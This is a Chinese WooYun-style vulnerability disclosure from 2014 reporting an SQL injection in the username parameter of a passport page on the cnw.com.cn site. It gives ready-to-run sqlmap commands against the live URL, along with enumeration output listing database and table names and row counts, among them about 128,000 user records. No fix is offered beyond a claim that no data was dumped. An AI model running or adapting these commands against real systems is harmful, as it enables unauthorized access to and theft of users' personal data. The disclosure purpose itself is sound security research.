漏洞详情

披露状态:

2014-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网界网分站SQL注射(十几万用户数据)

详细说明:

注入点:

http://passport.cnw.com.cn/findusername.php?username=crtest1



其中,username参数存在SQL注射漏洞。

漏洞证明:

sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db

01.jpg



sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count



+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| userauditlogs | 264429 |
| users | 128142 |
| users2 | 127382 |
| laiyuan | 30618 |
| bjjt_login | 20666 |
| xdd_answer | 19526 |
| bjjt_dc | 14017 |
| sg_qdetial | 13698 |
| rel_usermail | 9077 |
| rel_usermail_20131206 | 8858 |
| sg_role | 4055 |
| t4 | 2862 |
| bjjt_reg | 1643 |
| urlvisitrecords | 1332 |
| intel121112 | 819 |
| bjjt1 | 649 |
| t3 | 275 |
| t1 | 184 |
| unsub_fb | 162 |
| sg1 | 138 |
| informatica | 101 |
| rel_othermail | 54 |
| sg_que | 45 |
| wy_industry | 35 |
| wy_duty | 20 |
| sg_roleitem | 18 |
| bjjtcourse | 15 |
| murlinfos | 12 |
| mailtypes | 10 |
| wy_companysize | 7 |
| wy_Turnover | 7 |
| sg_final_fight | 6 |
| wy_Pcsize | 6 |
| wy_serversize | 6 |
| bjjtcoursecate | 2 |
| bjjtadmin | 1 |
| sg_num | 1 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 959 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 76 |
| STATISTICS | 69 |
| KEY_COLUMN_USAGE | 54 |
| TABLE_CONSTRAINTS | 54 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 30 |
| SCHEMATA | 4 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Database: ccw_passport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| users | 19 |
+---------------------------------------+---------+

Database: cnwprojects
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| answer2 | 9665739 |
| answer | 32107 |
| users | 3573 |
| 20090609_cisco | 2055 |
| 20090605_ibm | 867 |
| news_content | 461 |
| 20090424_juniper | 447 |
| 20090311_symantec_records | 403 |
| 20090608_arrayamp | 235 |
| 20090309_symantec | 97 |
| question | 97 |
| newsletter | 26 |
| 20090506_novell | 15 |
| manswer | 13 |
| project | 12 |
| fuzeren | 8 |
| mquestion | 6 |
| meeting | 5 |
| musers | 2 |
+---------------------------------------+---------+

修复方案:

安全测试,绝未脱裤 :)

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价: